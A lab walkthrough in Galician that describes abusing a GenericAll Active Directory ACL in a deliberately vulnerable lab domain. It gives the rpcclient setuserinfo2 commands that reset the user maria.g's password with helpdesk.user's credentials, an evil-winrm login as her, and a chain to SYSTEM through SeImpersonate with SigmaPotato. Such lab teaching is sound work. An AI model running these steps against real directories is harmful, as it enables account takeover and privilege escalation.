Ir ao contido

Vector de Ataque: Abuso de ACLs (HelpDesk -> Maria)

Fase: 4. Post-Explotación
Usuario de Partida: helpdesk.user (Necesítanse credenciais).
Usuario Vítima: maria.g.

Descrición:
En Active Directory, as Listas de Control de Acceso (ACLs) determinan quen pode facer que sobre un obxecto. Neste laboratorio, o grupo HelpDesk (do que helpdesk.user é membro) configurouse intencionadamente con permisos GenericAll sobre o usuario maria.g. Isto significa control total, incluíndo a capacidade de cambiar o contrasinal sen coñecer o actual.

Aviso de Viabilidade no Laboratorio

Aínda que a vulnerabilidade ACL existe, o usuario helpdesk.user non ten permisos de acceso remoto (ni WinRM nin RDP) nin un contrasinal débil. Polo tanto, nun escenario de caixa negra, é difícil explotar isto antes de ser Administrador. Este documento explica o procedemento técnico asumiendo que se obtiveron as credenciais (ex: vía extracción dende o sistema(dumping) ou enxeñaría social).

Diagrama de ataque

Fig. Diagrama de ataque

Procedemento Paso a Paso

1. Enumeración de Permisos (BloodHound)

A mellor forma de detectar isto é mediante BloodHound. Ao analizar o grafo, verase unha liña directa: HelpDesk -[GenericAll]-> maria.g.

2. Explotación: Cambio de Contrasinal (Remoto)

Como non temos acceso por consola (shell) con helpdesk.user, debemos executar o cambio de contrasinal remotamente usando o protocolo RPC dende Linux.

Usando rpcclient dende Kali: Necesitamos as credenciais de helpdesk.user (obtidas ex: tras un secretsdump global).

# Conectamos ao servizo RPC
$ rpcclient -U "VULN-HE.LAB\helpdesk.user%HelpDeskP@ss1" 192.168.56.100

# Cambiamos o contrasinal de maria.g (ID 23 é o nivel de password set)
rpcclient $> setuserinfo2 maria.g 23 'NovoPassword123!'

3. Pivotaxe e Validación

Agora que cambiamos o contrasinal de maria.g, podemos conectarnos coa súa conta. Maria si ten permisos de acceso remoto.

$ evil-winrm -i 192.168.56.100 -u maria.g -p 'NovoPassword123!'
...
*Evil-WinRM* PS C:\Users\maria.g\Documents> whoami
vuln-he\maria.g

4. Encadeamento de Ataques (Camiño a SYSTEM)

Unha vez logueados como maria.g, o ataque convértese no escenario de escalada local (ver documento ATAQUE_ESPECIFICO_SEIMPERSONATE

  1. Verificar privilexios: whoami /priv (buscamos SeImpersonatePrivilege).
  2. Subir Exploit: Subir SigmaPotato.exe.
  3. Executar: Cambiar contrasinal de Administrador ou obter SYSTEM.

Resumo da Cadea de Ataque:
1. Compromiso de HelpDesk (Necesario acceso inicial).
2. Abuso de ACL (GenericAll) -> Control de Maria.
3. Abuso de Privilexio (SeImpersonate) -> Control de SYSTEM.